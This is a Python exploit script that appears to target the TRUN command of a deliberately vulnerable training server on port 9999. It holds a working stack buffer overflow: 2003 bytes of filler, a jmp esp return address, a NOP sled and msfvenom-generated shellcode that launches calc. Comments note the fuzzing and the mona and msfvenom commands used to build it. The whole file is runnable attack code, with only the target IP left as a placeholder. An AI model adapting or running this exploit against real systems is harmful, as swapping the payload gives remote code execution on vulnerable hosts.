#!/usr/bin/python3
import socket
import subprocess
import struct
# Connection settings read by send_exploit(). "X.X.X.X" is the placeholder
# as published on this page, not a configured host; connect() cannot succeed
# until it is replaced, which is the intended state for an archived sample.
target_ip = "X.X.X.X"
target_port = 9999
def send_exploit(attack_string):
    """Deliver *attack_string* over a fresh TCP connection to the module target.

    Connects to (target_ip, target_port), reads up to 2048 bytes and prints
    them decoded, then issues a single send() of *attack_string*. The socket is
    deliberately left unclosed, exactly as in the original; the function
    returns None and any socket or decode error propagates to the caller.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((target_ip, target_port))
    banner = conn.recv(2048)
    print(banner.decode())
    conn.send(attack_string)
def make_buffer():
    """Assemble the request bytes that main() hands to send_exploit().

    The result is the concatenation, in this order, of: the command prefix,
    2003 filler bytes, a 4-byte little-endian address, a 25-byte NOP sled and
    the encoded payload bytes reproduced verbatim from the page. Pure
    function: no I/O, no global state; returns a bytes object.
    """
    command_prefix = b"TRUN /.:/"
    # offset found using boofuzz
    filler = b"A" * 2003
    # !mona find -type instr -s "jmp esp" -x X
    return_address = struct.pack("<I", 0x62501203)
    nop_sled = b"\x90" * 25
    # msfvenom -p windows/exec CMD="calc" -f python -b "\x00"
    # Opaque encoder output as published; nothing here validates or
    # interprets these bytes, they are joined as-is.
    payload_chunks = (
        b"\xdb\xd0\xbd\x32\xbc\xb0\xfd\xd9\x74\x24\xf4\x58\x29",
        b"\xc9\xb1\x30\x31\x68\x18\x83\xe8\xfc\x03\x68\x26\x5e",
        b"\x45\x01\xae\x1c\xa6\xfa\x2e\x41\x2e\x1f\x1f\x41\x54",
        b"\x6b\x0f\x71\x1e\x39\xa3\xfa\x72\xaa\x30\x8e\x5a\xdd",
        b"\xf1\x25\xbd\xd0\x02\x15\xfd\x73\x80\x64\xd2\x53\xb9",
        b"\xa6\x27\x95\xfe\xdb\xca\xc7\x57\x97\x79\xf8\xdc\xed",
        b"\x41\x73\xae\xe0\xc1\x60\x66\x02\xe3\x36\xfd\x5d\x23",
        b"\xb8\xd2\xd5\x6a\xa2\x37\xd3\x25\x59\x83\xaf\xb7\x8b",
        b"\xda\x50\x1b\xf2\xd3\xa2\x65\x32\xd3\x5c\x10\x4a\x20",
        b"\xe0\x23\x89\x5b\x3e\xa1\x0a\xfb\xb5\x11\xf7\xfa\x1a",
        b"\xc7\x7c\xf0\xd7\x83\xdb\x14\xe9\x40\x50\x20\x62\x67",
        b"\xb7\xa1\x30\x4c\x13\xea\xe3\xed\x02\x56\x45\x11\x54",
        b"\x39\x3a\xb7\x1e\xd7\x2f\xca\x7c\xbd\xae\x58\xfb\xf3",
        b"\xb1\x62\x04\xa3\xd9\x53\x8f\x2c\x9d\x6b\x5a\x09\x51",
        b"\x26\xc7\x3b\xfa\xef\x9d\x7e\x67\x10\x48\xbc\x9e\x93",
        b"\x79\x3c\x65\x8b\x0b\x39\x21\x0b\xe7\x33\x3a\xfe\x07",
        b"\xe0\x3b\x2b\x64\x67\xa8\xb7\x6b",
    )
    payload = b"".join(payload_chunks)
    return b"".join((command_prefix, filler, return_address, nop_sled, payload))
def main():
    """Script entry point: build the request with make_buffer() and pass it
    straight to send_exploit(). Returns None; errors from either step propagate.
    """
    send_exploit(make_buffer())
# Only run when executed directly, so importing the module (e.g. to inspect
# make_buffer() in isolation) performs no network activity.
if __name__ == '__main__':
    main()